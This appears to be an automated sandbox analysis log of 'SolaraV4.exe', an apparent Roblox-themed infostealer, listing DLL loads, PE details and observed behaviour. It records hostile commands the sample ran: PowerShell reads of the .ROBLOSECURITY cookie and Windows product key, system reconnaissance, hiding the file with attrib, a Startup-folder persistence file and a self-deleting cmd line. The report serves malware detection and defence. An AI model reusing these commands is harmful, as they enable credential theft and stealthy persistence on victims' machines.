Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\Desktop\pyvenv.cfg
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: SolaraV4.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SolaraV4.exe Static file information: File size 6232292 > 1048576
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SolaraV4.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV4.exe, 00000001.00000003.2466343863.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2990881493.00007FFE957E1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: SolaraV4.exe, 00000003.00000002.2991089669.00007FFE99DB1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: SolaraV4.exe, 00000003.00000002.2989395110.00007FFE904EB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: SolaraV4.exe, 00000003.00000002.2989741254.00007FFE90591000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: SolaraV4.exe, 00000003.00000002.2990037817.00007FFE90B61000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV4.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.pdbhP3r source: powershell.exe, 00000043.00000002.2720390881.0000016199A66000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: SolaraV4.exe, SolaraV4.exe, 00000003.00000002.2981417985.00007FFE75E15000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: SolaraV4.exe, 00000003.00000002.2986882718.00007FFE7651B000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Thu Aug 26 18:34:57 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV4.exe, 00000003.00000002.2984685427.00007FFE760AD000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: SolaraV4.exe, 00000003.00000002.2990354313.00007FFE94441000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb?? source: SolaraV4.exe, 00000003.00000002.2981417985.00007FFE75E15000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: SolaraV4.exe, 00000003.00000002.2989049105.00007FFE8FF81000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV4.exe, 00000003.00000002.2984685427.00007FFE760AD000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: SolaraV4.exe, 00000003.00000002.2990592997.00007FFE94AC1000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: SolaraV4.exe, 00000003.00000002.2988340988.00007FFE8F3F1000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.pdb source: powershell.exe, 00000043.00000002.2720390881.0000016199A66000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: SolaraV4.exe, 00000003.00000002.2980855878.00007FFE75D8B000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: SolaraV4.exe, 00000003.00000002.2988713456.00007FFE8FF67000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: SolaraV4.exe, 00000003.00000002.2989395110.00007FFE904EB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006C.00000000.2823194797.00007FF7C7250000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 0000006C.00000002.2839982108.00007FF7C7250000.00000002.00000001.01000000.00000021.sdmp
Source: SolaraV4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SolaraV4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SolaraV4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SolaraV4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SolaraV4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.cmdline"
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E502A0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 3_2_00007FFE75E502A0
Source: SolaraV4.exe Static PE information: real checksum: 0x5efae4 should be: 0x5f66c5
Source: python310.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x17995b
Source: unicodedata.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x50e34
Source: libffi-7.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x9bb1
Source: _ctypes.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x13fd8
Source: _bz2.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x14310
Source: sqlite3.dll.1.dr Static PE information: real checksum: 0x0 should be: 0xa6bab
Source: libcrypto-1_1.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x1190af
Source: libssl-1_1.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x3d4af
Source: _ssl.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x183af
Source: _queue.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0xd67b
Source: _socket.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x13b4b
Source: _hashlib.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x8c9e
Source: _decimal.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x21c60
Source: select.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x6de4
Source: _lzma.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x1fbb8
Source: _sqlite3.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x17e7a
Source: myx0gned.dll.74.dr Static PE information: real checksum: 0x0 should be: 0xa629
Source: libffi-7.dll.1.dr Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.1.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86E0B push rsp; ret 3_2_00007FFE75C86E13
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C89D95 push rsp; iretq 3_2_00007FFE75C89D96
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C885B7 push r12; ret 3_2_00007FFE75C885F3
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C8856C push rbp; retf 3_2_00007FFE75C88585
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86D06 push r12; ret 3_2_00007FFE75C86D08
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86CDC push r8; ret 3_2_00007FFE75C86CE9
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86CFA push rdx; ret 3_2_00007FFE75C86D01
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C8A4B9 push rdx; ret 3_2_00007FFE75C8A510
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C877FA push rsi; ret 3_2_00007FFE75C87831
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86F9D push r10; ret 3_2_00007FFE75C86FB0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86F42 push r12; ret 3_2_00007FFE75C86F5A
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86F64 push r8; ret 3_2_00007FFE75C86F6C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C88F63 push r12; iretd 3_2_00007FFE75C88F7A
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C88F0E push r12; ret 3_2_00007FFE75C88F35
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86EC6 push r10; retf 3_2_00007FFE75C86EC9
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86EE0 push r12; ret 3_2_00007FFE75C86EFE
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86E9C push rsp; iretd 3_2_00007FFE75C86E9D
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86EAB push rsi; ret 3_2_00007FFE75C86EAC
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86E54 push rdi; iretd 3_2_00007FFE75C86E56
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C88E76 push rbp; iretq 3_2_00007FFE75C88E77
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C891B3 push rdi; iretd 3_2_00007FFE75C891B5
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C8A174 push rsp; ret 3_2_00007FFE75C8A175
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C89C12 push rsp; retf 3_2_00007FFE75C89C13
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86C31 push r10; ret 3_2_00007FFE75C86C33
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C892F4 push r10; retf 3_2_00007FFE75C89360
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C8A2F5 push rsp; retf 3_2_00007FFE75C8A2F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFE15BD7DEE push ss; ret 14_2_00007FFE15BD7DEF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFE15BD76A4 push ds; ret 14_2_00007FFE15BD76A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFE15BD764C push ds; ret 14_2_00007FFE15BD7650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFE15BD1AC9 push es; retf 14_2_00007FFE15BD1ACA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFE15CA0591 push eax; ret 14_2_00007FFE15CA0592
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\SolaraV4.exe Process created: "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: attrib.exe
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\libffi-7.dll
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_sqlite3.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\libcrypto-1_1.dll
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\python310.dll
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_queue.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_lzma.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_socket.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_decimal.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\VCRUNTIME140.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.dll
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_ctypes.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\select.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_ssl.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\sqlite3.dll
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\unicodedata.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\libssl-1_1.dll
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_bz2.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_hashlib.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\SolaraV4.exe""
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC55830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError, 1_2_00007FF6FFC55830
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
